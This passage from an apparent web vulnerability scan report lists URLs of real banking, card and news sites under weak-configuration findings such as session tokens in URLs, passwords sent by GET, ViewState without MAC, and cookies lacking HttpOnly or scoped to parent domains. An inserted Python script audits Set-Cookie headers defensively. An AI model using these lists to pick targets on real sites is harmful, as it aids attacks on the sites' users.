6.172. https://www.wellsfargo.com/wachovia/autoloans/index

6.173. https://www.wellsfargo.com/wachovia/insurance

6.174. https://www.wellsfargo.com/wachovia/wealthmanagement/index

6.175. https://www.wellsfargo.com/wf/product/apply

6.176. https://www.wellsfargo.com/wfonline/

6.177. https://www.wellsfargo.com/wfonline/bill_pay/

7. Session token in URL

7.1. http://textchat.bankofamerica.com/hc/44850650/

7.2. http://visa.via.infonow.net/usa_atm/

7.3. http://www.arbornetworks.com/contact

7.4. http://www.arbornetworks.com/en/partnership-inquiry-form.html

7.5. https://www.bankofamerica.com/credit-cards/cardoverview.action

7.6. http://www.facebook.com/extern/login_status.php

7.7. http://www.kansascity.com/2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html

7.8. http://www.lokeshdhakar.com/

8. Password field submitted using GET method

8.1. http://fis.com/fis/worldnews/worldnews.asp

8.2. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

8.3. http://www.fis.com/fis/worldnews/worldnews.asp

9. ASP.NET ViewState without MAC enabled

9.1. http://www.merrilledge.com/m/pages/self-directed-investing.aspx

9.2. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx

9.3. https://www.merrilledge.com/m/pages/home.aspx

9.4. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx

10. Cookie scoped to parent domain

10.1. https://chaseonline.chase.com/

10.2. http://food.change.org/blog/view/bluefin_brigade_to_the_rescue

10.3. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

10.4. https://online.cardmemberservices.com/

10.5. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

10.6. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

10.7. https://onlineservices.wachovia.com/auth/AuthService

10.8. https://pncpoints.visaextras.com/

10.9. http://www.cualn.com/members/stepthree

10.10. http://www.directstartv.com/

10.11. http://www.forum-software.org/tag/ipboard

10.12. http://www.macaudailytimes.com.mo/cron_image.html

10.13. http://www.macaudailytimes.com.mo/imagecode.html

10.14. http://www.macaudailytimes.com.mo/js/lang.php

10.15. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html

10.16. http://www.opensource.org/licenses/gpl-license.php

10.17. http://www.opensource.org/licenses/mit-license.php

10.18. http://a.tribalfusion.com/j.ad

10.19. http://ads.adbrite.com/adserver/vdi/762701

10.20. https://adwords.google.com/select/Login

10.21. http://affiliate.invisionpower.com/scripts/track.php

10.22. http://api.viglink.com/api/ping

10.23. http://blogsearch.google.com/

10.24. http://books.google.com/bkshp

10.25. http://books.google.com/books

10.26. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.27. https://chaseonline.chase.com/auth/login.aspx

10.28. https://chaseonline.chase.com/chaseonline/reidentify/sso_reidentify.jsp

10.29. https://chaseonline.chase.com/js/Reporting.js

10.30. http://code.google.com/p/swfobject/

10.31. http://groups.google.com/groups

10.32. http://groups.google.com/grphp

10.33. http://id.google.com/verify/EAAAAG9kfZvLTzdTC1gh7mvNeo8.gif

10.34. http://image2.pubmatic.com/AdServer/Pug

10.35. http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345

10.36. http://leadback.advertising.com/adcedge/lb

10.37. http://maps.google.com/maps

10.38. http://maps.google.com/maps/place

10.39. http://maps.yahoo.com/set_beta

10.40. https://online.wellsfargo.com/signon

10.41. http://picasaweb.google.com/lh/view

10.42. https://picasaweb.google.com/home

10.43. https://picasaweb.google.com/lh/view

10.44. http://pixel.quantserve.com/pixel

10.45. http://r.turn.com/r/beacon

10.46. https://resources.cardmemberservices.com/MyAccounts.aspx

10.47. https://resources.chase.com/MyAccounts.aspx

10.48. http://s.xp1.ru4.com/meta

10.49. https://s.xp1.ru4.com/meta

10.50. https://sitekey.bankofamerica.com/sas/resetIDScreen.do

10.51. https://sitekey.bankofamerica.com/sas/resetPasscodeScreen.do

10.52. https://sitekey.bankofamerica.com/sas/signon.do

10.53. http://solutions.liveperson.com/ref/lppb.asp

10.54. http://stg.xp1.ru4.com/meta

10.55. https://stg.xp1.ru4.com/meta

10.56. http://tc.bankofamerica.com/i

10.57. https://tc.bankofamerica.com/c

10.58. http://translate.google.com/

10.59. http://translate.google.com/translate_t

10.60. http://usa.visa.com/

10.61. http://video.google.com/

10.62. http://www.abc.net.au/news/stories/2011/01/20/3117032.htm

10.63. http://www.abc.net.au/rural/news/content/201102/s3126694.htm

10.64. http://www.bankofamerica.com/creditcards/index.cfm

10.65. http://www.bankofamerica.com/help/

10.66. http://www.bankofamerica.com/help/index.cfm

10.67. https://www.bankofamerica.com/

10.68. https://www.bankofamerica.com/credit-cards/cardoverview.action

10.69. https://www.bankofamerica.com/homepage/overview.go

10.70. https://www.bankofamerica.com/homepage/stateSelect.go

10.71. https://www.bankofamerica.com/myexpression_banking/

10.72. https://www.bankofamerica.com/retirementcenter

10.73. https://www.bankofamerica.com/retirementcenter/

10.74. http://www.capitalone.com/about/

10.75. http://www.capitalone.com/autoloans/

10.76. http://www.capitalone.com/autoloans/auto-loan-calculator.php

10.77. http://www.capitalone.com/autoloans/index.php

10.78. http://www.capitalone.com/autoloans/lp/auto-loans-pict.php

10.79. http://www.capitalone.com/autoloans/refinance/

10.80. http://www.capitalone.com/bank/commercial/

10.81. http://www.capitalone.com/bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php

10.82. http://www.capitalone.com/capitaloneplace/disclosures.php

10.83. http://www.capitalone.com/careers/

10.84. http://www.capitalone.com/checking-accounts/

10.85. http://www.capitalone.com/contactus/

10.86. http://www.capitalone.com/contactus/faq.php

10.87. http://www.capitalone.com/contactus/olbsupport.php

10.88. http://www.capitalone.com/creditcards/

10.89. http://www.capitalone.com/creditcards/products/browse-all/

10.90. http://www.capitalone.com/creditcards/products/browse-all/popular/

10.91. http://www.capitalone.com/directbanking/

10.92. http://www.capitalone.com/directbanking/online-certificates-deposit/

10.93. http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/

10.94. http://www.capitalone.com/directbanking/online-savings-accounts/

10.95. http://www.capitalone.com/directbanking/online-savings-accounts/high-yield-money-market-account/

10.96. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/

10.97. http://www.capitalone.com/directbanking/online-savings-accounts/rewards-money-market-account/index.php

10.98. http://www.capitalone.com/financialeducation/

10.99. http://www.capitalone.com/financialeducation/creditcardact/index.php

10.100. http://www.capitalone.com/fraud/prevention/index.php

10.101. http://www.capitalone.com/loans/

10.102. http://www.capitalone.com/onlinebanking/overview.php

10.103. http://www.capitalone.com/personalloans/

10.104. http://www.capitalone.com/protection/privacy/index.php

10.105. http://www.capitalone.com/protection/security/index.php

10.106. http://www.capitalone.com/redirect.php

10.107. http://www.capitalone.com/rewards/index.php

10.108. http://www.capitalone.com/rewards/service-login.php

10.109. http://www.capitalone.com/sitemap/

10.110. http://www.capitalone.com/smallbusiness/

10.111. http://www.capitalone.com/smallbusiness/business-money-market/

10.112. http://www.capitalone.com/smallbusiness/cards/

10.113. http://www.capitalone.com/smallbusiness/cards/index.php

10.114. http://www.capitalone.com/smallbusiness/payroll/

10.115. https://www.capitalone.com/

10.116. https://www.capitalone.com/creditcards/gateway/

10.117. https://www.capitalone.com/scripts/thirdparty/xplus1/xp1vars.js.php

10.118. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html

10.119. https://www.chase.com/

10.120. https://www.chase.com/wamuwelcome3/

10.121. http://www.chasestudentloans.com/studentloans

10.122. http://www.facebook.com/2008/fbml

10.123. http://www.facebook.com/campaign/landing.php

10.124. http://www.firstusa.com/xcards4/common/weblinking/weblinking.html

10.125. http://www.google.com/finance

10.126. http://www.google.com/setprefs

10.127. http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren

10.128. http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house

10.129. http://www.ibsnetaccess.com/

10.130. http://www.merrilledge.com/m/pages/self-directed-investing.aspx

10.131. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx

10.132. https://www.merrilledge.com/m/pages/home.aspx

10.133. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx

10.134. https://www.mystreetscape.com/my/charteroneinvest

10.135. https://www.mystreetscape.com/my/citizensinvest

10.136. https://www.onlinebanking.pnc.com/alservlet/ForgotUserIdServlet

10.137. https://www.onlinebanking.pnc.com/alservlet/OnlineBankingServlet

10.138. http://www.retirement.merrilledge.com/IRA/pages/home.aspx

10.139. http://www.totalmerrill.com/TotalMerrill/pages/home.aspx

10.140. http://www.viglink.com/

10.141. http://www.wachovia.com/

10.142. http://www.wcti12.com/news/26551757/detail.html

10.143. http://www.wellsfargo.com/

10.144. https://www.wellsfargo.com/

10.145. https://www.wellsfargo.com/about/diversity/

10.146. https://www.wellsfargo.com/autoloans/

10.147. https://www.wellsfargo.com/autoloans/apply

10.148. https://www.wellsfargo.com/browser/jaws_setting

10.149. https://www.wellsfargo.com/careers/

10.150. https://www.wellsfargo.com/checking/

10.151. https://www.wellsfargo.com/com/comintro

10.152. https://www.wellsfargo.com/credit_cards/

10.153. https://www.wellsfargo.com/credit_cards/select_card

10.154. https://www.wellsfargo.com/equity/

10.155. https://www.wellsfargo.com/equity/rate_payments/information/rate_calc

10.156. https://www.wellsfargo.com/help/

10.157. https://www.wellsfargo.com/help/faqs/signon_faqs

10.158. https://www.wellsfargo.com/help/services

10.159. https://www.wellsfargo.com/insurance/

10.160. https://www.wellsfargo.com/insurance/id_credit_protection/idtheft

10.161. https://www.wellsfargo.com/investing/hsa/enroll

10.162. https://www.wellsfargo.com/investing/investmentservices/

10.163. https://www.wellsfargo.com/investing/more

10.164. https://www.wellsfargo.com/investing/mutual_funds/

10.165. https://www.wellsfargo.com/investing/retirement/

10.166. https://www.wellsfargo.com/investing/retirement/openira/

10.167. https://www.wellsfargo.com/jump/about/fdic

10.168. https://www.wellsfargo.com/jump/applications/inprogress

10.169. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

10.170. https://www.wellsfargo.com/jump/wachovia/insurance/identity

10.171. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

10.172. https://www.wellsfargo.com/locator/atm/preSearch

10.173. https://www.wellsfargo.com/locator/atm/search

10.174. https://www.wellsfargo.com/mortgage/

10.175. https://www.wellsfargo.com/mortgage/rates

10.176. https://www.wellsfargo.com/online_brokerage/education/trading/volatile/

10.177. https://www.wellsfargo.com/per/more/banking

10.178. https://www.wellsfargo.com/per/more/loans_credit

10.179. https://www.wellsfargo.com/personal_credit/

10.180. https://www.wellsfargo.com/personal_credit/rate_payments/rate_calc_main

10.181. https://www.wellsfargo.com/privacy_security/

10.182. https://www.wellsfargo.com/privacy_security/fraud/

10.183. https://www.wellsfargo.com/privacy_security/fraud/report/

10.184. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

10.185. https://www.wellsfargo.com/privacy_security/online/guarantee

10.186. https://www.wellsfargo.com/products_services/HE_selector

10.187. https://www.wellsfargo.com/products_services/applications_viewall

10.188. https://www.wellsfargo.com/products_services/brokerage_cklist

10.189. https://www.wellsfargo.com/products_services/deposit_cklist

10.190. https://www.wellsfargo.com/products_services/pll_select

10.191. https://www.wellsfargo.com/rates/rates_viewall

10.192. https://www.wellsfargo.com/savings_cds/

10.193. https://www.wellsfargo.com/savings_cds/apply

10.194. https://www.wellsfargo.com/savings_cds/cds

10.195. https://www.wellsfargo.com/search/search

10.196. https://www.wellsfargo.com/sitemap

10.197. https://www.wellsfargo.com/student/

10.198. https://www.wellsfargo.com/student/loans/apply

10.199. https://www.wellsfargo.com/tas

10.200. https://www.wellsfargo.com/theprivatebank/

10.201. https://www.wellsfargo.com/wachovia

10.202. https://www.wellsfargo.com/wachovia/

10.203. https://www.wellsfargo.com/wachovia/autoloans/index

10.204. https://www.wellsfargo.com/wachovia/insurance

10.205. https://www.wellsfargo.com/wachovia/wealthmanagement/index

10.206. https://www.wellsfargo.com/wf/product/apply

10.207. https://www.wellsfargo.com/wfonline/

10.208. https://www.wellsfargo.com/wfonline/bill_pay/

10.209. http://www.youtube.com/

10.210. http://www.youtube.com/results

10.211. http://www.youtube.com/watch

10.212. https://www2.bankofamerica.com/promos/jump/greatdeals/

10.213. https://www6.bankofamerica.com/planning/investments.action
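
The "Cookie scoped to parent domain" entries above and the "Cookie without HttpOnly flag set" entries that follow are both decided from the attributes of a Set-Cookie header. The check below is an added example, not part of this report and not CloudScan's own code: it parses a Set-Cookie value, normalises the Domain attribute as RFC 6265 browsers do (case-insensitive, leading dot dropped), and reports the parent-domain case when the Domain attribute names a proper parent of the responding host, plus the missing HttpOnly case. All hosts and cookies in SAMPLE_RESPONSES are constructed for the example; nothing here was captured from the sites listed. It does not consult the Public Suffix List, so a Domain set to a public suffix would be reported as a parent-domain cookie even though browsers discard it.

```python
"""Set-Cookie audit for the two cookie issue classes in this report.

Added example; the hosts and cookies below are constructed, not captured
from any site listed in the report.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class Cookie:
    name: str
    value: str
    domain: Optional[str] = None   # normalised: lower-case, leading dot removed
    path: Optional[str] = None
    secure: bool = False
    httponly: bool = False
    other: Dict[str, str] = field(default_factory=dict)


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value (lenient RFC 6265 parsing)."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")   # split on the first '=' only
    cookie = Cookie(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain":
            # RFC 6265 5.2.3: a leading dot is ignored; matching is case-insensitive
            cookie.domain = val.lower().lstrip(".") or None
        elif key == "path":
            cookie.path = val or None
        elif key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.httponly = True
        else:
            cookie.other[key] = val
    return cookie


# Issue labels, matching the section names used in this report
PARENT_DOMAIN = "Cookie scoped to parent domain"
NO_HTTPONLY = "Cookie without HttpOnly flag set"
DOMAIN_REJECTED = "Domain attribute not a suffix of the responding host (browser discards cookie)"


def audit_cookie(host: str, header: str) -> List[str]:
    """Return the issue labels that apply to one Set-Cookie header sent by `host`.

    A Domain attribute naming a parent of `host` makes the cookie visible to
    every sibling host under that parent. Public suffixes are not special-cased.
    """
    cookie = parse_set_cookie(header)
    host = host.lower()
    issues: List[str] = []
    if cookie.domain is not None:
        if cookie.domain == host:
            pass  # Domain equals the host: a domain cookie, but not widened to a parent
        elif host.endswith("." + cookie.domain):
            issues.append(PARENT_DOMAIN)
        else:
            issues.append(DOMAIN_REJECTED)
    if not cookie.httponly:
        issues.append(NO_HTTPONLY)
    return issues


# Constructed sample responses: (responding host, Set-Cookie header value).
SAMPLE_RESPONSES = [
    ("online.example-bank.com",
     "SESSIONID=3f9a1c; Domain=.example-bank.com; Path=/; Secure; HttpOnly"),
    ("www.example.com", "prefs=en; Path=/"),
    ("app.example.com", "sid=7b2e; Domain=app.example.com; Path=/; Secure; HttpOnly"),
    ("app.example.com", "tracker=1; Domain=other.example.org; Path=/"),
]


def audit_all(samples=SAMPLE_RESPONSES) -> Dict[Tuple[str, str], List[str]]:
    """Map (host, cookie name) to the list of issues found for that cookie."""
    results: Dict[Tuple[str, str], List[str]] = {}
    for host, header in samples:
        cookie = parse_set_cookie(header)
        results[(host, cookie.name)] = audit_cookie(host, header)
    return results


if __name__ == "__main__":
    for (host, name), issues in audit_all().items():
        print(f"{host:26} {name:10} {', '.join(issues) or 'no issue'}")
```

Run it directly to print one line per sample cookie; the first sample shows the section 10 pattern (a host under example-bank.com setting Domain=.example-bank.com), the second the section 11 pattern. When used against real responses, feed it every Set-Cookie header separately rather than the joined Cookie header, since the attributes that matter are only present in Set-Cookie.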

11. Cookie without HttpOnly flag set

11.1. http://careers.bankofamerica.com/overview/overview.asp

11.2. http://careers.jpmorganchase.com/career/careerhome

11.3. https://chaseonline.chase.com/

11.4. http://chat.livechatinc.net/licence/1043255/script.cgi

11.5. http://corporate.visa.com/

11.6. http://data.coremetrics.com/cm

11.7. http://fis.com/fis/worldnews/worldnews.asp

11.8. http://icg.citi.com/icg/global_banking/index.jsp

11.9. http://icg.citi.com/icg/global_markets/index.jsp

11.10. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/

11.11. http://ipboard-software.software.informer.com/

11.12. http://learn.bankofamerica.com/

11.13. http://locators.bankofamerica.com/locator/gen3loc/

11.14. http://locators.bankofamerica.com/locator/locator/LocatorAction.do

11.15. http://lovely-faces.com/

11.16. http://m.usa.visa.com/m/assistance/access.jsp

11.17. http://m.usa.visa.com/m/assistance/contact.jsp

11.18. http://m.usa.visa.com/m/assistance/index.jsp

11.19. http://m.usa.visa.com/m/assistance/lost.jsp

11.20. http://m.usa.visa.com/m/cards/buxx.jsp

11.21. http://m.usa.visa.com/m/cards/credit.jsp

11.22. http://m.usa.visa.com/m/cards/debit.jsp

11.23. http://m.usa.visa.com/m/cards/gift.jsp

11.24. http://m.usa.visa.com/m/cards/index.jsp

11.25. http://m.usa.visa.com/m/cards/prepaid.jsp

11.26. http://m.usa.visa.com/m/cards/readylink.jsp

11.27. http://m.usa.visa.com/m/cards/travelmoney.jsp

11.28. http://m.usa.visa.com/m/discounts/index.jsp

11.29. http://m.usa.visa.com/m/index.jsp

11.30. http://m.usa.visa.com/m/legal.jsp

11.31. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp

11.32. https://myaccountsaws.navyfcu.org/mfnfopwd/

11.33. https://online.cardmemberservices.com/

11.34. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

11.35. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

11.36. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp

11.37. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp

11.38. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp

11.39. http://query.jpmorgan.com/inetSearch/index.jsp

11.40. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do

11.41. http://search.wareseeker.com/ip-board/

11.42. https://secure.opinionlab.com/ccc01/comment_card.asp

11.43. https://secure.opinionlab.com/rate36s.asp

11.44. https://sitekey.bankofamerica.com/sas/resetIDScreen.do

11.45. https://sitekey.bankofamerica.com/sas/resetPasscodeScreen.do

11.46. https://sitekey.bankofamerica.com/sas/signon.do

11.47. http://smallbusinessonlinecommunity.bankofamerica.com/

11.48. http://sofa.bankofamerica.com/eluminate

11.49. http://solutions.liveperson.com/ref/lppb.asp

11.50. https://support01.arbornetworks.com/

11.51. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

11.52. http://twitter.com/PracticalMoney

11.53. http://twitter.com/navyfederalnews

11.54. http://usa.visa.com/cardadvisor/CardAdvisor

11.55. http://usa.visa.com/personal/account-inquiries/card_providers.jsp

11.56. http://usa.visa.com/personal/discounts/index.jsp

11.57. http://usa.visa.com/personal/security/identity_theft_search.jsp

11.58. http://usa.visa.com/personal/student/index.jsp

11.59. http://usa.visa.com/personal/visa_brings_you/mytaxrefund.jsp

11.60. http://usa.visa.com/specialOffers/AOLVisaOffers/offers.jsp

11.61. http://usa.visa.com/specialOffers/CMS/offers.jsp

11.62. http://usa.visa.com/specialOffers/Yahoo/offers.jsp

11.63. https://usa.visa.com/signaturesouthwest/index.jsp

11.64. https://usa.visa.com/specialOffers/FUSA_Amazon/offers.jsp

11.65. http://visa.com/

11.66. http://visa.com/

11.67. http://visa.via.infonow.net/usa_atm/

11.68. http://visasignature.mobi/

11.69. https://www.1sttools.com/loginout/login.asp

11.70. https://www.accessmycardonline.com/RBS_Consumer/SecuredLogin.do

11.71. http://www.arbornetworks.com/report

11.72. http://www.asual.com/swfaddress/

11.73. http://www.bankofamerica.com/creditcards/index.cfm

11.74. http://www.bankofamerica.com/help/

11.75. http://www.bankofamerica.com/help/equalhousing_popup.cfm

11.76. http://www.bankofamerica.com/index.cfm

11.77. http://www.bankofamerica.com/weblinking/

11.78. https://www.bankofamerica.com/

11.79. https://www.bankofamerica.com/Control.do

11.80. https://www.bankofamerica.com/credit-cards/cardoverview.action

11.81. https://www.bankofamerica.com/deposits/index.action

11.82. https://www.bankofamerica.com/homepage/WidgetAction.go

11.83. https://www.bankofamerica.com/homepage/overview.go

11.84. https://www.bankofamerica.com/homepage/stateSelect.go

11.85. https://www.bankofamerica.com/hub/index.action

11.86. https://www.bankofamerica.com/myexpression_banking/

11.87. https://www.bankofamerica.com/planning/

11.88. https://www.bankofamerica.com/planning/investments.action

11.89. https://www.bankofamerica.com/privacy/Control.do

11.90. https://www.bankofamerica.com/privacy/index.jsp

11.91. https://www.bankofamerica.com/retirementcenter/

11.92. https://www.bankofamerica.com/search/Search.do

11.93. https://www.bankofamerica.com/sitemap/index.action

11.94. https://www.bankofamerica.com/smallbusiness/index.jsp

11.95. http://www.capitalone.com/about/

11.96. http://www.capitalone.com/smallbusiness/

11.97. http://www.capitalone.com/smallbusiness/business-money-market/

11.98. http://www.capitalone.com/smallbusiness/cards/

11.99. http://www.capitalone.com/smallbusiness/cards/index.php

11.100. http://www.capitalone.com/smallbusiness/payroll/

11.101. https://www.chase.com/MilitaryLendingProgram

11.102. https://www.chase.com/ccp/index.jsp

11.103. https://www.chase.com/chf/mortgage/om_chasecom_redirect

11.104. https://www.chase.com/framework/skeletons/psmgenskel

11.105. https://www.chase.com/framework/skins/psmgenskin

11.106. https://www.chase.com/framework/skins/psmgenskin/images

11.107. https://www.chase.com/index.jsp

11.108. https://www.chase.com/online/logon/on_successful_logon.jsp

11.109. http://www.citi.com/domain/index.jsp

11.110. http://www.citi.com/domain/scripts/config.jsp

11.111. http://www.citi.com/search/advanced.jsp

11.112. http://www.citi.com/search/results.jsp

11.113. https://www.citibank.com/us/cards/index.jsp

11.114. http://www.cualn.com/members/stepthree

11.115. http://www.directstartv.com/

11.116. http://www.emagazine.com/view/

11.117. https://www.esp01.pnc.com/LaunchPad/dflt/Login.pncadv

11.118. http://www.fdic.gov/

11.119. http://www.firstnational.com/

11.120. http://www.firstnational.com/config/html/en/searchresults.asp

11.121. http://www.firstnational.com/config/html/en/setcookie.asp

11.122. http://www.firstnationalinvestmentsandplanning.com/

11.123. http://www.fis.com/fis/worldnews/worldnews.asp

11.124. http://www.forum-software.org/tag/ipboard

11.125. http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren

11.126. https://www.ibsnetaccess.com/NASApp/NetAccess/AboutDisplay

11.127. https://www.ibsnetaccess.com/NASApp/NetAccess/ContactsDisplay

11.128. https://www.ibsnetaccess.com/NASApp/NetAccess/DisplayScreen

11.129. https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay

11.130. https://www.ibsnetaccess.com/NASApp/NetAccess/LoginValidation

11.131. https://www.ibsnetaccess.com/NASApp/NetAccess/PreAuthentication

11.132. https://www.ibsnetaccess.com/NASApp/NetAccess/TermsOfUseDisplay

11.133. https://www.ibsnetaccess.com/NASApp/NetAccess/popupAction.action

11.134. http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1

11.135. http://www.jpmorgan.com/cm/Satellite

11.136. http://www.jpmorgan.com/pages/jpmorgan

11.137. http://www.jpmorgan.com/pages/jpmorgan/home/business

11.138. http://www.jpmorgan.com/pages/jpmorgan/home/corporations

11.139. http://www.jpmorgan.com/pages/jpmorgan/home/fi

11.140. http://www.jpmorgan.com/pages/jpmorgan/home/individuals

11.141. http://www.jpmorgan.com/pages/jpmorgan/home/publicsector

11.142. http://www.macaudailytimes.com.mo/cron_image.html

11.143. http://www.macaudailytimes.com.mo/imagecode.html

11.144. http://www.macaudailytimes.com.mo/js/lang.php

11.145. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html

11.146. https://www.merchantsummary.com/fnmsonline/fnms_ms_login.asp

11.147. https://www.mystreetscape.com/my/charteroneinvest

11.148. https://www.mystreetscape.com/my/citizensinvest

11.149. http://www.oneofacard.com/generalinfo.asp

11.150. http://www.oneofacard.com/generalinfo.asp

11.151. http://www.oneofacard.com/generalinfo2.asp

11.152. https://www.onlinebanking.pnc.com/alservlet/ForgotUserIdServlet

11.153. https://www.onlinebanking.pnc.com/alservlet/OnlineBankingServlet

11.154. http://www.opensource.org/licenses/gpl-license.php

11.155. http://www.opensource.org/licenses/mit-license.php

11.156. https://www.pnc.com/webapp/sec/Forms.do

11.157. https://www.pnc.com/webapp/sec/ProductsAndService.do

11.158. https://www.pnc.com/webapp/unsec/Blank.do

11.159. https://www.pnc.com/webapp/unsec/Gateway.do

11.160. https://www.pnc.com/webapp/unsec/Homepage.do

11.161. https://www.pnc.com/webapp/unsec/Homepage.do

11.162. https://www.pnc.com/webapp/unsec/NCProductsAndService.do

11.163. https://www.pnc.com/webapp/unsec/ProductsAndService.do

11.164. https://www.pnc.com/webapp/unsec/Solutions.do

11.165. https://www.pnc.com/webapp/unsec/depositRates/init.app

11.166. https://www.pnc.com/webapp/unsec/homeEquity/init.app

11.167. https://www.retirementgold.com/

11.168. https://www.smart-hsa.com/pnc/

11.169. https://www.smart-hsa.com/pnc/

11.170. http://www.thestandard.com.hk/news_detail.asp

11.171. http://www.transactionservices.citigroup.com/transactionservices/home/

11.172. http://www.transactionservices.citigroup.com/transactionservices/home/tts/

11.173. http://www.transunion.com/

11.174. http://www.upi.com/Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/

11.175. http://www.viglink.com/

11.176. http://www.visa.com/globalgateway/main.jsp

11.177. https://www.wachovia.com/checking

11.178. https://www.wachovia.com/enroll

11.179. https://www.wachovia.com/espanol

11.180. https://www.wachovia.com/foundation/v/index.jsp

11.181. https://www.wachovia.com/helpcenter

11.182. https://www.wachovia.com/home-equity

11.183. https://www.wachovia.com/inside

11.184. https://www.wachovia.com/legal

11.185. https://www.wachovia.com/privacyandsecurity

11.186. https://www.wachovia.com/retirementlogin

11.187. https://www.wachovia.com/savings

11.188. https://www.wachovia.com/savings/featured-cd.html

11.189. https://www.wachovia.com/securityplus

11.190. http://www.webveteran.com/

11.191. https://www.wellsfargo.com/

11.192. https://www4.usbank.com/internetBanking/RequestRouter

11.193. https://www4.usbank.com/internetBanking/RequestRouter

11.194. https://www4.usbank.com/internetBanking/RequestRouter

11.195. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp

11.196. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp

11.197. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp

11.198. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp

11.199. https://www6.bankofamerica.com/planning/investments.action

11.200. http://a.tribalfusion.com/j.ad

11.201. http://ad.thehill.com/www/delivery/ajs.php

11.202. http://ad.thehill.com/www/delivery/al.php

11.203. http://ad.thehill.com/www/delivery/avw.php

11.204. http://ad.thehill.com/www/delivery/ck.php

11.205. http://ad.thehill.com/www/delivery/lg.php

11.206. http://ad.yieldmanager.com/pixel

11.207. http://ads.adbrite.com/adserver/vdi/762701

11.208. https://adwords.google.com/select/Login

11.209. http://affiliate.invisionpower.com/scripts/track.php

11.210. http://api.viglink.com/api/ping

11.211. http://blogsearch.google.com/

11.212. http://books.google.com/bkshp

11.213. http://books.google.com/books

11.214. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.215. https://chaseonline.chase.com/auth/login.aspx

11.216. https://chaseonline.chase.com/chaseonline/reidentify/sso_reidentify.jsp

11.217. https://chaseonline.chase.com/js/Reporting.js

11.218. http://citi.bridgetrack.com/a/c/

11.219. http://citi.bridgetrack.com/a/s/

11.220. http://citi.bridgetrack.com/a/s/

11.221. http://citi.bridgetrack.com/track/

11.222. http://code.google.com/p/swfobject/

11.223. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

11.224. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

11.225. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

11.226. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

11.227. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

11.228. http://community.invisionpower.com/files/

11.229. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/

11.230. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/

11.231. http://community.invisionpower.com/files/file/3937-peace/

11.232. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/

11.233. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/

11.234. http://community.invisionpower.com/files/file/3940-dp31-ihost/

11.235. http://community.invisionpower.com/files/file/3941-vanilla-valentine/

11.236. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/

11.237. http://community.invisionpower.com/files/file/3943-speed/

11.238. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/

11.239. http://community.invisionpower.com/index.php

11.240. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17

11.241. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

11.242. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

